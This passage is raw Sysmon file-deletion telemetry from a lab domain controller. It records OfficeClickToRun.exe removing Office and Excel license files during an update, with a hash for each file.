23542300x800000000000000067056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp4-ul-phn.xrm-msMD5=05C299C8903D7D9BCAEB27C060E2A454,SHA256=7B0011EBE5DF037BEC3F4611FA2499893F8D303B96F8D58D9053F97F78722656,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp4-ul-oob.xrm-msMD5=DB89EC8DBEAB29BD7D4415EE5B64E60C,SHA256=B728AA83D4B128C2109150F1AD94A56EAC8237A9FC81E29C411FD8EA00AA4282,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp4-ppd.xrm-msMD5=6BAD99967C6B128857FD6DEFEBDE4E0E,SHA256=D9179BCDCA85F38622D227B198B1E6BBEEDCDF9E0E928B67BFCF0A3933C8DE98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp4-pl.xrm-msMD5=9D9645C441B65A249B892DCEB1650110,SHA256=317AAA74D39D15B6987EFF3892D96D79421E46AB96510F0513871A1CE9070294,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-phn.xrm-msMD5=195509A3159657161EB09D9C881C8D4C,SHA256=CC7E1D1ECF64AB168D7F51BC683BFEA0BC7E60158AE9CF255156BD8C558843BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-oob.xrm-msMD5=A18887D613ABA6142695305E3539C2B6,SHA256=4D2041C9ECCE9A9E0B3F44595141B587E3D45D12766ACABDECAFBC5CA7E7D6AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ppd.xrm-msMD5=A285977D9F1F1879E53E0EB27D2D6F0F,SHA256=80BE43268152633E11D7E752B96BED247F5597FE827C8D42DB5CB8A3892665BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp3-pl.xrm-msMD5=A2B36808BAB77B7AA4FB786D109BC793,SHA256=CA5EAA428C540DCC881A57D7DC03B188C8C1BD2D7D7B697B5C48E55AD8E01CED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ul-phn.xrm-msMD5=B0289F56024B333B19DE932725AA75FE,SHA256=F956B7BB64A9E20B264AD9AA695DF176B091C5D602F7AAF1AA6C8C2C085F7E8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ul-oob.xrm-msMD5=33CAC8F6FCE480C136833F83D741CA74,SHA256=330D5A925FCD5DF9A4169A08A3799B37D226513D0DD306764C4DBAEB5A8D82BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ppd.xrm-msMD5=DCC04B47F5536DC69DE9FCE70FEAC674,SHA256=008B076989E3FD19CBC6BEA3774DA294442428ED356C0FD968D176B3570B31C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp2-pl.xrm-msMD5=7613B0642AABED8869A7A8D1E06B78A3,SHA256=362F531AEEA0A76E52AF73A16F5D6DBBF4253AC159CACB94EF67B24CDFA18D34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-phn.xrm-msMD5=250FB16058BEDE210783981ED160D1B8,SHA256=57077C1C02805A7CBD4B4E9DAF78330935C00265C192146F7D7A1B5064C98555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-oob.xrm-msMD5=20C57192F762C03574DCB5D3E7E3320E,SHA256=C45695DBAE1160D4D32227B99733986DB0FAB8BF7DFC43A20AAAB945878111DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp-ppd.xrm-msMD5=E6240D341996BC8DEC3274A0064973DB,SHA256=3768DFE36243316EA432B254FD46494863C80887B98EE5EABEA9B8074142D7C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_OEM_Perp-pl.xrm-msMD5=2D924302C16E09AC3B926160769A2FDD,SHA256=BBA5F08D71C395F74AE189BC70F440F49E87D49DE1F8423024BC59518E75A4E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-msMD5=16DBAA42C4BBE545E046CA3288F748BF,SHA256=8D0ABBBE2CECFF3165D1A7C729045C06BDC872C8348DE6118D2E588D47CECD93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019R_Grace-ppd.xrm-msMD5=E6FA521102335713C56C94D39DDF08AD,SHA256=DAF31CC0AB10E4C308586BEE419E360B39BA06BF0990E17D40AFC236149E28D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019DemoR_BypassTrial180-ul-oob.xrm-msMD5=09F1D2AD24C2C3753029528B990A7CE0,SHA256=AC91A144194FA3FB8C356336019229DD5292D567805DE2C7F5BDB20D80890B14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\HomeBusiness2019DemoR_BypassTrial180-ppd.xrm-msMD5=B8CE73E681CF957CD4CAD173B8195250,SHA256=E01C93B8C959B038C30133A42CC0CE02CFE92EE7D6D5A6D6A5DBAF20DDF9C867,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelVL_MAK-ul-phn.xrm-msMD5=3A6581DB895F46781DEE8D79E0E05101,SHA256=ECB3F2F35B19D6B4047773724696946F647408AEEA08B49AA4C14570142D75D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelVL_MAK-ul-oob.xrm-msMD5=FB1A61E5AC5EF7DF44B13D0DCCAD41C5,SHA256=D610880F12287BD7015D80E7B16083663B7ED142BE4F52E8F6C9746606B01A1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelVL_MAK-ppd.xrm-msMD5=F71D65FA6F6639F2A7AD6BBEC9985124,SHA256=5E49A60E60CFA3FEC72EC84E066CB3ED7EDED01A06ED6E4B72DD2D4C712E2870,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelVL_MAK-pl.xrm-msMD5=200F96AC030A1551EB6AA9D65E1F9D88,SHA256=77726F92EF2DF074986696C195D04A54E0098DA5AB8DB0DA32DE4C21B2EC6200,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelVL_KMS_Client-ul.xrm-msMD5=9EAEFA52D6FE0A4C2199E5989D34789C,SHA256=32F81B71D71234271F82C5A31BC5AE8C3F407215157844C55E88337779A6143B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelVL_KMS_Client-ul-oob.xrm-msMD5=C8E0DF01A2B4CC6DDA4C47AE3CBF4C47,SHA256=5283D0401DFE6EE6C74EB47DBB1DB6BA6EDD00870C00AC8F57E7A90102A6D3D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelVL_KMS_Client-ppd.xrm-msMD5=2BCD97E78930542F110EDD826071DADA,SHA256=82F740074085D41E7A16E467C4663EFA623C0539FB09976254D2EFF997DEAD19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_Trial-ul-oob.xrm-msMD5=667EBDC59E82832412C550699B749CD2,SHA256=7D353E792FDFAE12313C444E7C35E68D8E3DEFED09625E716C8FA76A8E533850,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_Trial-ppd.xrm-msMD5=4A6237287ABBF94D541742635AD2BF93,SHA256=A45FA900CE2869CA51DBB15464A55BE8C296D334C58309342B4AA67FF1FA9317,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_Trial-pl.xrm-msMD5=73B6B94E819F7CDF5306C6511FE5F1EB,SHA256=C8D5954F54A05704563AEA9AF2DDFE0B39F98C5384B56C64FE68A4145F1C9505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_Retail-ul-phn.xrm-msMD5=D189FBDE163470777466169A30911DB6,SHA256=4E3CA762AF79B7E70F1D1E61CFC695B85B87DA7EB4AF838227C5BB2E2841BA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_Retail-ul-oob.xrm-msMD5=8EDDABAD168751B7A98E5ED8621B53B9,SHA256=347A403912D1FEDB6E9F6BA112760B6BD6FF76D345FAA557E8B334F1AD18FDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_Retail-ppd.xrm-msMD5=9DAA6724E9B045FD9067519E3FFDBD91,SHA256=2B9F7EE4AA308B7079A5F55491F674FF3318869F397D0A26914AB85F2B56951F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_Retail-pl.xrm-msMD5=CD5C356C0DBE526B4581114A7A3DB1C1,SHA256=247AE10A52DD0AC488F825ECA86C34C9F2155BE064A5095901C916C3A7F7A3AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_OEM_Perp-ul-phn.xrm-msMD5=F6446A497E4C00FF8BC99594BC6AF3DC,SHA256=81A07CAD0DFD7ED67F02B74C7FA85F05A7A9F2A46270F792D1F8752DAE2D9A02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-msMD5=8406115DBB9C0ACE73629A22DFA6E7EF,SHA256=EE246ABAF2B3121FB21AD8F7DE11F04F76E7F22108A9CCC4FBC27FE7D2568C71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_OEM_Perp-ppd.xrm-msMD5=C58719051B67540F11DBFBF2C941F001,SHA256=6A13DEABDB38768E49279D6B844E611A22D467D680B5F49F870658245A9A5FA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_OEM_Perp-pl.xrm-msMD5=289DEA07CF0D9E7DB762C1E20D79A61B,SHA256=886D2C0504A958371C077CC15EB6AD037EA90DE205CFCDF708DA9C7787081E42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_Grace-ul-oob.xrm-msMD5=8159B18D5FE2B54F8932E33F2E3A1C5C,SHA256=2A9DF02EC9A6004EEC46F95F636E80A28D1B2CDF9A6C1F47A7482F2EECBE37F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ExcelR_Grace-ppd.xrm-msMD5=95ABF22DC7D31A0B22BE4440C381B32F,SHA256=34A86EAD6716553C8FFAB49A77EB04872925EC9C792603C45467A1CF4FF7006F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019VL_MAK_AE-ul-phn.xrm-msMD5=36D122AC12B03E1A66BF0B141A8E21D5,SHA256=EEE7472732F28C2E87B18897AC1D156B5CA1D2318078033ABCC964022ACEF935,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019VL_MAK_AE-ul-oob.xrm-msMD5=10AA858E053518A8656B49FDB4D9BF00,SHA256=5EF434096B8D22F940C85D4ECC2FC24283BB4DD1DCF7E49312C68BEE9BCD29C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019VL_MAK_AE-ppd.xrm-msMD5=8EB36244493549BB48E8F96D769D1190,SHA256=20AEC94659E8DFBFF9D198C6BB5B3B958F7F2539C17BABEAE1D9681E9F93B979,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 